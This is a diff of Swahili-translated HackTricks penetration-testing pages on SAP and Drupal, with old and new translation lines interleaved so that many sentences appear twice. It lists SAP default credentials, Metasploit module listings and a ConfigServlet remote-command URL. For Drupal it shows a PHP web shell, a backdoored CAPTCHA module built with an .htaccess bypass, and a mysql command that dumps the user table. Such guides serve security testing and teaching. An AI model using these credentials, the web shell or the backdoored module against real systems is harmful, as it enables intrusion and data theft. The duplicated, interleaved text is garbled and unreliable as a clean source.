Kila kifaa cha SAP kimegawanywa katika wateja. Kila mmoja ana mtumiaji SAP\*, sawa na "root" kwenye programu.
|
||||
Baada ya kuundwa kwa mara ya kwanza, mtumiaji huyu SAP\* anapata nenosiri la chaguo-msingi: "060719992" \(nenosiri zaidi ya chaguo-msingi yapo hapa chini\).
|
||||
Utashtuka ikiwa ungejua mara ngapi **nenosiri hizi hazibadiliki katika mazingira ya majaribio au maendeleo**!
|
||||
Kila kifaa cha SAP kimegawanywa katika wateja. Kila mmoja ana mtumiaji SAP\*, sawa na "root" wa programu.
|
||||
Baada ya kuundwa kwa mara ya kwanza, mtumiaji huyu SAP\* anapata nenosiri la msingi: "060719992" \(nenosiri zaidi la msingi hapa chini\).
|
||||
Ungeshangaa kama ungejua mara ngapi hizi **nenosiri hazibadilishwi katika mazingira ya majaribio au maendeleo**!
|
||||
|
||||
Jaribu kupata ufikiaji wa kabati la seva yoyote kwa kutumia jina la mtumiaji <SID>adm.
|
||||
Kuvunja nguvu kunaweza kusaidia, hata hivyo, kuna mekanizmio ya Kufunga Akaunti.
|
||||
Jaribu kupata ufikiaji wa kabati la seva yoyote ukitumia jina la mtumiaji <SID>adm.
|
||||
Kuvunja kwa nguvu kunaweza kusaidia, hata hivyo kuna uwezekano wa kuwepo kwa mfumo wa Kufunga Akaunti.
|
||||
|
||||
# Ugunduzi
|
||||
|
||||
> Sehemu inayofuata kwa kiasi kikubwa inatoka [https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures) kutoka kwa mtumiaji shipcod3!
|
||||
> Sehemu inayofuata kwa kiasi kikubwa ni kutoka [https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures) kutoka kwa mtumiaji shipcod3!
|
||||
|
||||
* Angalia Wigo wa Maombi au Muhtasari wa Programu kwa ajili ya kupima. Chukua maelezo ya majina ya mwenyeji au vifaa vya mfumo kwa ajili ya kuunganisha na SAP GUI.
|
||||
* Tumia OSINT \(open source intelligence\), Shodan na Google Dorks kuangalia faili, subdomains, na habari muhimu ikiwa programu inaonekana kwenye mtandao au ni ya umma:
|
||||
* Angalia Upeo wa Programu au Maelezo ya Programu kwa ajili ya majaribio. Chukua maelezo ya majina ya mwenyeji au vipande vya mfumo kwa ajili ya kuunganisha kwenye SAP GUI.
|
||||
* Tumia OSINT \(intelejensia ya chanzo wazi\), Shodan na Google Dorks kuchunguza faili, subdomains, na taarifa muhimu ikiwa programu inaonekana mtandaoni au inaonekana kwa umma:
|
||||
```text
|
||||
inurl:50000/irj/portal
|
||||
inurl:IciEventService/IciEventConf
|
||||
|
@ -45,17 +49,17 @@ https://www.shodan.io/search?query=SAP+J2EE+Engine
|
|||
```
|
||||
* Hapa ndivyo [http://SAP:50000/irj/portal](http://sap:50000/irj/portal) inavyoonekana
|
||||
|
||||
![Skrini ya kuingia SAP](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/sap%20logon.jpeg)
|
||||
![Skrini ya Kuingia SAP](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/sap%20logon.jpeg)
|
||||
|
||||
* Tumia nmap kuangalia bandari zilizofunguliwa na huduma zinazojulikana (sap routers, webdnypro, huduma za wavuti, seva za wavuti, nk.)
|
||||
* Tafuta URL ikiwa kuna seva ya wavuti inayofanya kazi.
|
||||
* Fuzz miongozo (unaweza kutumia Burp Intruder) ikiwa ina seva za wavuti kwenye bandari fulani. Hapa kuna orodha nzuri za maneno zinazotolewa na Mradi wa SecLists kwa kutafuta Njia za Msingi za SAP ICM na miongozo mingine ya kuvutia au faili:
|
||||
* Tumia nmap kuangalia mabano yaliyofunguliwa na huduma zinazojulikana \(routa za sap, webdynpro, huduma za wavuti, seva za wavuti, n.k.\)
|
||||
* Tembelea URL ikiwa kuna seva ya wavuti inayotumika.
|
||||
* Fanya fujo kwenye miongozo \(unaweza kutumia Burp Intruder\) ikiwa ina seva za wavuti kwenye mabano fulani. Hapa kuna orodha nzuri za maneno zinazotolewa na Mradi wa SecLists kwa kutafuta Njia za ICM za SAP za msingi na miongozo au faili zingine za kuvutia:
|
||||
|
||||
[https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/URLs/urls\_SAP.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/URLs/urls-SAP.txt)
|
||||
[https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/CMS/SAP.fuzz.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/CMS/SAP.fuzz.txt)
|
||||
[https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/sap.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/sap.txt)
|
||||
|
||||
* Tumia moduli ya Metasploit ya SAP SERVICE DISCOVERY kwa kuhesabu mifano/huduma/vipengele vya SAP:
|
||||
* Tumia moduli ya Metasploit ya SAP SERVICE DISCOVERY ya ziada kwa kuhesabu mifano/huduma/vipengele vya SAP:
|
||||
```text
|
||||
msf > use auxiliary/scanner/sap/sap_service_discovery
|
||||
msf auxiliary(sap_service_discovery) > show options
|
||||
|
@ -72,12 +76,11 @@ rhosts => 192.168.96.101
|
|||
msf auxiliary(sap_service_discovery) > run
|
||||
[*] 192.168.96.101: - [SAP] Beginning service Discovery '192.168.96.101'
|
||||
```
|
||||
## Kujaribu Mteja Mnene / SAP GUI
|
||||
## Kujaribu Mteja Mpana / SAP GUI
|
||||
|
||||
Hapa kuna amri ya kuunganisha kwenye SAP GUI
|
||||
`sapgui <jina la mwenyeji wa seva ya SAP> <namba ya mfumo>`
|
||||
Hapa kuna amri ya kuunganisha kwenye SAP GUI `sapgui <jina la mwenyeji wa seva ya sap> <namba ya mfumo>`
|
||||
|
||||
* Angalia kwa siri za msingi \(Katika Uainishaji wa Hatari wa Bugcrowd, hii inachukuliwa kama P1 -> Usanidi Mbaya wa Usalama wa Seva \| Kutumia Siri za Msingi \| Seva ya Uzalishaji\):
|
||||
* Angalia kwa siri za msingi \(Katika Uainishaji wa Hatari wa Bugcrowd, hii inachukuliwa kama P1 -> Usalama wa Seva Usiofaa \| Kutumia Sifa za Msingi \| Seva ya Uzalishaji\):
|
||||
```text
|
||||
# SAP* - High privileges - Hardcoded kernel user
|
||||
SAP*:06071992:*
|
||||
|
@ -128,34 +131,34 @@ SAP*:Down1oad:000,001
|
|||
DEVELOPER:Down1oad:001
|
||||
BWDEVELOPER:Down1oad:001
|
||||
```
|
||||
* Chalaza Wireshark kisha thibitisha mteja (SAP GUI) kwa kutumia sifa ulizopata kwa sababu baadhi ya wateja hutuma sifa bila SSL. Kuna programu-jalizi mbili maarufu za Wireshark ambazo zinaweza kuchambua vichwa vikuu vya msingi vinavyotumiwa na itifaki ya SAP DIAG pia: Programu-jalizi ya uchambuzi wa SAP ya SecureAuth Labs na programu-jalizi ya SAP DIAG ya Positive Research Center.
|
||||
* Angalia kwa ajili ya kuinua haki za kipekee kama kutumia baadhi ya Nambari za Uendeshaji za SAP (tcodes) kwa watumiaji wenye haki za chini:
|
||||
* SU01 - Kuunda na kudumisha watumiaji
|
||||
* SU01D - Kuonyesha watumiaji
|
||||
* SU10 - Kwa matengenezo ya wingi
|
||||
* SU02 - Kwa uundaji wa mwongozo wa maelezo
|
||||
* SM19 - Ukaguzi wa usalama - usanidi
|
||||
* SE84 - Mfumo wa Habari kwa R/3 za SAP
|
||||
* Angalia ikiwa unaweza kutekeleza amri za mfumo / kukimbia hati katika mteja.
|
||||
* Angalia ikiwa unaweza kufanya XSS kwenye BAPI Explorer
|
||||
* Chukua Wireshark kisha thibitisha kwa mteja \(SAP GUI\) ukitumia sifa ulizopata kwa sababu baadhi ya wateja hutuma sifa bila SSL. Kuna programu-jalizi mbili maarufu za Wireshark ambazo zinaweza kuchambua vichwa vikuu vinavyotumiwa na itifaki ya SAP DIAG pia: Programu-jalizi ya uchambuzi wa SAP ya SecureAuth Labs na programu-jalizi ya SAP DIAG ya Positive Research Center.
|
||||
* Angalia kwa ajili ya kuongeza mamlaka kama kutumia baadhi ya Msimbo wa Shughuli za SAP \(tcodes\) kwa watumiaji wenye mamlaka ya chini:
|
||||
* SU01 - Kujenga na kudumisha watumiaji
|
||||
* SU01D - Kuonyesha Watumiaji
|
||||
* SU10 - Kwa matengenezo ya wingi
|
||||
* SU02 - Kwa uundaji wa mikono wa maelezo
|
||||
* SM19 - Ukaguzi wa usalama - usanidi
|
||||
* SE84 - Mfumo wa Taarifa kwa Ruhusa za SAP R/3
|
||||
* Angalia kama unaweza kutekeleza amri za mfumo / kukimbia hati kwenye mteja.
|
||||
* Angalia kama unaweza kufanya XSS kwenye BAPI Explorer
|
||||
|
||||
# Jaribio la kiolesura cha wavuti
|
||||
|
||||
* Tafuta URL (angalia hatua ya ugunduzi).
|
||||
* Fanya Fuzz kwenye URL kama ilivyokuwa katika hatua ya ugunduzi. Hapa ndipo [http://SAP:50000/index.html](http://sap:50000/index.html) inavyoonekana:
|
||||
* Tembelea URL \(angalia hatua ya ugunduzi\).
|
||||
* Fanya Fuzz kwenye URL kama ilivyofanyika katika hatua ya ugunduzi. Hapa ndivyo [http://SAP:50000/index.html](http://sap:50000/index.html) inavyoonekana:
|
||||
|
||||
![SAP Ukurasa wa Mwanzo](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/index.jpeg)
|
||||
|
||||
* Tafuta kasoro za kawaida za wavuti (Rejea kwa OWASP Top 10) kwa sababu kuna kasoro za XSS, RCE, XXE, nk. katika maeneo fulani.
|
||||
* Angalia [“The Bug Hunters Methodology”](https://github.com/jhaddix/tbhm) ya Jason Haddix kwa ajili ya kujaribu kasoro za wavuti.
|
||||
* Kuna uwezekano wa kuvuka uthibitisho kupitia kubadilisha maneno? Labda :)
|
||||
* Fungua `http://SAP:50000/webdynpro/resources/sap.com/XXX/JWFTestAddAssignees#` kisha bonyeza kifungo "Choose" na kisha katika dirisha lililofunguliwa bonyeza "Search". Unapaswa kuweza kuona orodha ya watumiaji wa SAP (Marejeo ya Kasoro: [ERPSCAN-16-010](https://erpscan.com/advisories/erpscan-16-010-sap-netweaver-7-4-information-disclosure/))
|
||||
* Je, sifa zinawasilishwa kupitia HTTP? Ikiwa ndivyo, inachukuliwa kama P3 kulingana na [Vulnerability Rating Taxonomy](https://bugcrowd.com/vulnerability-rating-taxonomy) ya Bugcrowd: Uthibitishaji na Usimamizi wa Kikao Uliovunjika \| Kazi Dhaifu ya Kuingia Kupitia HTTP. Fungua [http://SAP:50000/startPage](http://sap:50000/startPage) pia au malango ya kuingia :\)
|
||||
* Tafuta kasoro za kawaida za wavuti \(Rejea kwa OWASP Top 10\) kwa sababu kuna kasoro za XSS, RCE, XXE, nk. katika baadhi ya maeneo.
|
||||
* Angalia mbinu ya Jason Haddix ya [“The Bug Hunters Methodology”](https://github.com/jhaddix/tbhm) kwa ajili ya kufanya majaribio ya kasoro za wavuti.
|
||||
* Kupitisha Uthibitishaji kupitia kubadilisha maneno? Labda :\)
|
||||
* Fungua `http://SAP:50000/webdynpro/resources/sap.com/XXX/JWFTestAddAssignees#` kisha bonyeza kitufe cha "Chagua" na kisha kwenye dirisha lililofunguliwa bonyeza "Tafuta". Unapaswa kuweza kuona orodha ya watumiaji wa SAP \(Kumbukumbu ya Kasoro: [ERPSCAN-16-010](https://erpscan.com/advisories/erpscan-16-010-sap-netweaver-7-4-information-disclosure/)\)
|
||||
* Je, sifa zinawasilishwa kupitia HTTP? Ikiwa ndivyo basi inachukuliwa kama P3 kulingana na [Uainishaji wa Uvumbuzi wa Kasoro wa Bugcrowd](https://bugcrowd.com/vulnerability-rating-taxonomy): Uthibitishaji Uliovunjika na Usimamizi wa Kikao \| Kazi Dhaifu ya Kuingia Kupitia HTTP. Kiashiria: Angalia [http://SAP:50000/startPage](http://sap:50000/startPage) pia au malango ya kuingia :\)
|
||||
|
||||
![SAP Ukurasa wa Kuanza](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/startPage.jpeg)
|
||||
|
||||
* Jaribu `/irj/go/km/navigation/` kwa orodha ya saraka inayowezekana au kuvuka uthibitisho
|
||||
* [http://SAP/sap/public/info](http://sap/sap/public/info) ina habari muhimu:
|
||||
* Jaribu `/irj/go/km/navigation/` kwa orodha ya saraka inayowezekana au upitishaji wa uthibitishaji
|
||||
* [http://SAP/sap/public/info](http://sap/sap/public/info) ina taarifa muhimu:
|
||||
```xml
|
||||
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
|
||||
<SOAP-ENV:Body>
|
||||
|
@ -188,8 +191,8 @@ BWDEVELOPER:Down1oad:001
|
|||
```
|
||||
# Shambulizi!
|
||||
|
||||
* Angalia ikiwa inatumia seva au teknolojia za zamani kama vile Windows 2000.
|
||||
* Panga mashambulizi / uvamizi unaowezekana, kuna moduli nyingi za Metasploit kwa ugunduzi wa SAP (moduli za ziada) na mashambulizi:
|
||||
* Angalia ikiendeshwa kwenye seva au teknolojia za zamani kama Windows 2000.
|
||||
* Panga mashambulizi/uvamizi uwezekanao, kuna moduli nyingi za Metasploit kwa ugunduzi wa SAP (moduli za ziada) na mashambulizi:
|
||||
```text
|
||||
msf > search sap
|
||||
Matching Modules
|
||||
|
@ -254,13 +257,13 @@ exploit/windows/lpd/saplpd 2008-02
|
|||
exploit/windows/misc/sap_2005_license 2009-08-01 great SAP Business One License Manager 2005 Buffer Overflow
|
||||
exploit/windows/misc/sap_netweaver_dispatcher 2012-05-08 normal SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow
|
||||
```
|
||||
* Jaribu kutumia baadhi ya mianya inayojulikana (angalia Exploit-DB) au mashambulizi kama vile "SAP ConfigServlet Remote Code Execution" katika SAP Portal:
|
||||
* Jaribu kutumia baadhi ya mbinu za kujulikana \(angalia Exploit-DB\) au mashambulizi kama lile la zamani lakini zuri "SAP ConfigServlet Remote Code Execution" kwenye SAP Portal:
|
||||
```text
|
||||
http://example.com:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=uname -a
|
||||
```
|
||||
![SAP Config Servlet RCE](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/sap_rce.jpeg)
|
||||
|
||||
* Kabla ya kutekeleza amri ya `start` kwenye script ya bizploit katika hatua ya Ugunduzi, unaweza pia kuongeza yafuatayo kwa ajili ya kufanya tathmini ya udhaifu:
|
||||
* Kabla ya kutekeleza amri ya `start` kwenye script ya bizploit katika hatua ya Uchunguzi, unaweza pia kuongeza yafuatayo kwa ajili ya kufanya tathmini ya udhaifu:
|
||||
```text
|
||||
bizploit> plugins
|
||||
bizploit/plugins> vulnassess all
|
||||
|
@ -282,18 +285,18 @@ bizploit/plugins> start
|
|||
bizploit/plugins> back
|
||||
bizploit> start
|
||||
```
|
||||
# Vifaa Vingine Vyenye Manufaa kwa Majaribio
|
||||
# Vifaa Vingine Vya Kufanya Majaribio
|
||||
|
||||
* [PowerSAP](https://github.com/airbus-seclab/powersap) - Zana ya Powershell ya kutathmini usalama wa SAP
|
||||
* [Burp Suite](https://portswigger.net/burp) - lazima iwe nayo kwa kufanya directory fuzzing na tathmini ya usalama wa wavuti
|
||||
* [pysap](https://github.com/SecureAuthCorp/pysap) - Maktaba ya Python ya kutengeneza pakiti za itifaki ya mtandao ya SAP
|
||||
* [https://github.com/gelim/nmap-erpscan](https://github.com/gelim/nmap-erpscan) - Inasaidia nmap kugundua SAP/ERP
|
||||
* [PowerSAP](https://github.com/airbus-seclab/powersap) - Zana ya Powershell kuchunguza usalama wa sap
|
||||
* [Burp Suite](https://portswigger.net/burp) - lazima uwe nayo kwa directory fuzzing na tathmini ya usalama wa wavuti
|
||||
* [pysap](https://github.com/SecureAuthCorp/pysap) - Maktaba ya Python kutengeneza pakiti za itifaki ya mtandao wa SAP
|
||||
* [https://github.com/gelim/nmap-erpscan](https://github.com/gelim/nmap-erpscan) - Saidia nmap kugundua SAP/ERP
|
||||
|
||||
## Marejeo
|
||||
|
||||
* [Kutathmini Usalama wa SAP Kwa Kutumia Metasploit](http://information.rapid7.com/rs/rapid7/images/SAP%20Penetration%20Testing%20Using%20Metasploit%20Final.pdf)
|
||||
* [https://github.com/davehardy20/SAP-Stuff](https://github.com/davehardy20/SAP-Stuff) - script ya kufanya Bizploit kwa njia ya nusu-otomatiki
|
||||
* [Usanidi wa Usalama wa SAP NetWeaver ABAP sehemu 3: Nenosiri za chaguo-msingi kwa ufikiaji wa programu](https://erpscan.com/press-center/blog/sap-netweaver-abap-security-configuration-part-2-default-passwords-for-access-to-the-application/)
|
||||
* [Kupenyeza Kwa SAP Kwa Kutumia Metasploit](http://information.rapid7.com/rs/rapid7/images/SAP%20Penetration%20Testing%20Using%20Metasploit%20Final.pdf)
|
||||
* [https://github.com/davehardy20/SAP-Stuff](https://github.com/davehardy20/SAP-Stuff) - script ya kusaidia kiotomatiki Bizploit
|
||||
* [Usanidi wa Usalama wa SAP NetWeaver ABAP sehemu 3: Nywila za chaguo-msingi kwa upatikanaji wa programu](https://erpscan.com/press-center/blog/sap-netweaver-abap-security-configuration-part-2-default-passwords-for-access-to-the-application/)
|
||||
* [Orodha ya nambari za shughuli za ABAP zinazohusiana na usalama wa SAP](https://wiki.scn.sap.com/wiki/display/Security/List+of+ABAP-transaction+codes+related+to+SAP+security)
|
||||
* [Kuvunja SAP Portal](https://erpscan.com/wp-content/uploads/presentations/2012-HackerHalted-Breaking-SAP-Portal.pdf)
|
||||
* [Mipasuko 10 ya kuvutia zaidi ya SAP na mashambulizi](https://erpscan.com/wp-content/uploads/presentations/2012-Kuwait-InfoSecurity-Top-10-most-interesting-vulnerabilities-and-attacks-in-SAP.pdf)
|
||||
|
@ -302,18 +305,21 @@ bizploit> start
|
|||
* [https://resources.infosecinstitute.com/topic/pen-stesting-sap-applications-part-1/](https://resources.infosecinstitute.com/topic/pen-stesting-sap-applications-part-1/)
|
||||
* [https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures)
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha** [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -14,7 +14,12 @@ Njia nyingine za kusaidia HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## Ufichuaji
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
## Ufumbuzi
|
||||
|
||||
* Angalia **meta**
|
||||
```bash
|
||||
|
@ -48,7 +53,7 @@ Mipangilio mapya ya Drupal kwa chaguo-msingi huzuia ufikiaji wa faili za `CHANGE
|
|||
|
||||
#### Jisajili
|
||||
|
||||
Katika _/user/register_ jaribu kuunda jina la mtumiaji na ikiwa jina tayari limechukuliwa utaarifiwa:
|
||||
Katika _/user/register_ jaribu kuunda jina la mtumiaji na ikiwa jina tayari limechukuliwa utapewa taarifa:
|
||||
|
||||
![](<../../.gitbook/assets/image (325).png>)
|
||||
|
||||
|
@ -72,7 +77,7 @@ Kwa kufikia _/user/\<number>_ unaweza kuona idadi ya watumiaji waliopo, kwa mfan
|
|||
|
||||
### Kurasa Zilizofichwa
|
||||
|
||||
**Fanya Ufutaji `/node/$` ambapo `$` ni nambari** (kutoka 1 hadi 500 kwa mfano).\
|
||||
**Fanya Utafutaji `/node/$` ambapo `$` ni nambari** (kutoka 1 hadi 500 kwa mfano).\
|
||||
Unaweza kupata **kurasa zilizofichwa** (jaribio, maendeleo) ambazo hazitajwi na injini za utaftaji.
|
||||
|
||||
#### Taarifa za Moduli Zilizosanikishwa
|
||||
|
@ -91,29 +96,29 @@ droopescan scan drupal -u http://drupal-site.local
|
|||
```
|
||||
## RCE
|
||||
|
||||
### Kwa Moduli ya Kichujio cha PHP
|
||||
### Kwa Moduli ya PHP Filter
|
||||
|
||||
{% hint style="warning" %}
|
||||
Katika toleo za zamani za Drupal **(kabla ya toleo la 8)**, ilikuwa inawezekana kuingia kama admin na **kuwezesha moduli ya `PHP filter`**, ambayo "Inaruhusu nambari/snippets za PHP zieleweke."
|
||||
Katika toleo za zamani za Drupal **(kabla ya toleo la 8)**, ilikuwa inawezekana kuingia kama admin na **kuwezesha moduli ya `PHP filter`**, ambayo "Inaruhusu nambari/vitambulisho vya PHP vilivyofungwa kutekelezwa."
|
||||
{% endhint %}
|
||||
|
||||
Unahitaji **programu-jalizi ya php iwe imewekwa** (angalia kwa kufikia _/modules/php_ na ikiwa inarudisha **403** basi, **ipo**, ikiwa **haipatikani**, basi **programu-jalizi ya php haijaingizwa**)
|
||||
Unahitaji **programu-jalizi ya php iwe imewekwa** (angalia kwa kufikia _/modules/php_ na ikiwa inarudisha **403** basi, **ipo**, ikiwa **haipatikani**, basi **programu-jalizi ya php haijawekwa**)
|
||||
|
||||
Nenda kwa _Modules_ -> (**Angalia**) _PHP Filter_ -> _Hifadhi mazingira_
|
||||
|
||||
![](<../../.gitbook/assets/image (247) (1).png>)
|
||||
|
||||
Kisha bofya _Ongeza maudhui_ -> Chagua _Ukurasa wa Msingi_ au _Makala_ -> Andika _mimba ya php kwenye mwili_ -> Chagua _Nambari ya PHP_ katika _Muundo wa Maandishi_ -> Chagua _Onyesha_
|
||||
Kisha bofya _Ongeza maudhui_ -> Chagua _Ukurasa wa Msingi_ au _Makala_ -> Andika _nambari ya php ya kabati kwenye mwili_ -> Chagua _Nambari ya PHP_ katika _Muundo wa Maandishi_ -> Chagua _Onesha_
|
||||
|
||||
![](<../../.gitbook/assets/image (335).png>)
|
||||
|
||||
Hatimaye tuifikie nodi iliyoanzishwa:
|
||||
Hatimaye tuifikie nodi iliyoanzishwa hivi karibuni:
|
||||
```bash
|
||||
curl http://drupal-site.local/node/3
|
||||
```
|
||||
### Sakinisha Moduli ya PHP Filter
|
||||
|
||||
Kuanzia toleo **8 na kuendelea**, [**PHP Filter**](https://www.drupal.org/project/php/releases/8.x-1.1) **moduli haijasakinishwa kwa chaguo-msingi**. Ili kutumia kazi hii, tunahitaji **kusakinisha moduli wenyewe**.
|
||||
Kuanzia toleo **8 na kuendelea**, [**Moduli ya PHP Filter**](https://www.drupal.org/project/php/releases/8.x-1.1) **haitasakinishwa kwa chaguo-msingi**. Ili kutumia kazi hii, tutalazimika **kusakinisha moduli wenyewe**.
|
||||
|
||||
1. Pakua toleo jipya zaidi la moduli kutoka kwenye tovuti ya Drupal.
|
||||
1. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
|
||||
|
@ -123,35 +128,35 @@ Kuanzia toleo **8 na kuendelea**, [**PHP Filter**](https://www.drupal.org/projec
|
|||
|
||||
### Moduli yenye mlango wa nyuma
|
||||
|
||||
Moduli yenye mlango wa nyuma inaweza kuundwa kwa **kuongeza ganda kwenye moduli iliyopo**. Moduli zinaweza kupatikana kwenye tovuti ya drupal.org. Chagua moduli kama vile [CAPTCHA](https://www.drupal.org/project/captcha). Endelea chini na nakili kiungo cha tar.gz [kumbukumbu](https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz).
|
||||
Moduli yenye mlango wa nyuma inaweza kuundwa kwa **kuongeza ganda kwenye moduli iliyopo**. Moduli zinaweza kupatikana kwenye tovuti ya drupal.org. Chagua moduli kama vile [CAPTCHA](https://www.drupal.org/project/captcha). Endelea chini na nakili kiungo cha tar.gz cha [kumbukumbu](https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz).
|
||||
|
||||
* Pakua kumbukumbu na fichua maudhui yake.
|
||||
```
|
||||
wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
|
||||
tar xvf captcha-8.x-1.2.tar.gz
|
||||
```
|
||||
* Unda **PHP web shell** na yaliyomo:
|
||||
* Unda **PHP web shell** na maudhui:
|
||||
```php
|
||||
<?php
|
||||
system($_GET["cmd"]);
|
||||
?>
|
||||
```
|
||||
* Kisha, tunahitaji kuunda faili ya **`.htaccess`** ili tupate ufikiaji wa folda. Hii ni muhimu kwani Drupal inakataa ufikiaji moja kwa moja wa folda ya **`/modules`**.
|
||||
* Kisha, tunahitaji kuunda faili ya **`.htaccess`** ili kupata ufikivu wa folda. Hii ni muhimu kwani Drupal inakataa ufikivu moja kwa moja kwenye folda ya **`/modules`**.
|
||||
```html
|
||||
<IfModule mod_rewrite.c>
|
||||
RewriteEngine On
|
||||
RewriteBase /
|
||||
</IfModule>
|
||||
```
|
||||
* Mipangilio hapo juu itatumika kwa sheria za folda ya / tunapohitaji faili katika /modules. Nakili faili zote mbili kwenye folda ya captcha na unda kiunzi.
|
||||
* Mipangilio hapo juu itatumika kwa sheria za folda ya / tunapouliza faili katika /modules. Nakili faili zote mbili kwenye folda ya captcha na unda kiunzi.
|
||||
```bash
|
||||
mv shell.php .htaccess captcha
|
||||
tar cvf captcha.tar.gz captcha/
|
||||
```
|
||||
* Kukadiria kwamba tuna **upatikanaji wa utawala** wa tovuti, bonyeza **`Manage`** na kisha **`Extend`** kwenye upau wa pembeni. Kisha, bonyeza kitufe cha **`+ Sakinisha moduli mpya`**, na tutapelekwa kwenye ukurasa wa usakinishaji, kama vile `http://drupal-site.local/admin/modules/install` Tafuta kwenye nyaraka ya Captcha iliyoharibiwa na bonyeza **`Sakinisha`**.
|
||||
* Mara baada ya usakinishaji kufanikiwa, tafuta **`/modules/captcha/shell.php`** kutekeleza amri.
|
||||
* Kukadiria kwamba tuna **upatikanaji wa utawala** kwenye tovuti, bonyeza **`Manage`** kisha **`Extend`** kwenye upau wa pembeni. Kisha, bonyeza kitufe cha **`+ Install new module`**, na tutapelekwa kwenye ukurasa wa kusakinisha, kama vile `http://drupal-site.local/admin/modules/install` Tafuta kwenye nyaraka ya Captcha iliyoharibiwa na bonyeza **`Install`**.
|
||||
* Mara tu usakinishaji unapofanikiwa, tafuta **`/modules/captcha/shell.php`** kutekeleza amri.
|
||||
|
||||
## Baada ya Uvamizi
|
||||
## Baada ya Kuvamia
|
||||
|
||||
### Soma settings.php
|
||||
```
|
||||
|
@ -165,9 +170,14 @@ mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from
|
|||
|
||||
* [https://academy.hackthebox.com/module/113/section/1209](https://academy.hackthebox.com/module/113/section/1209)
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
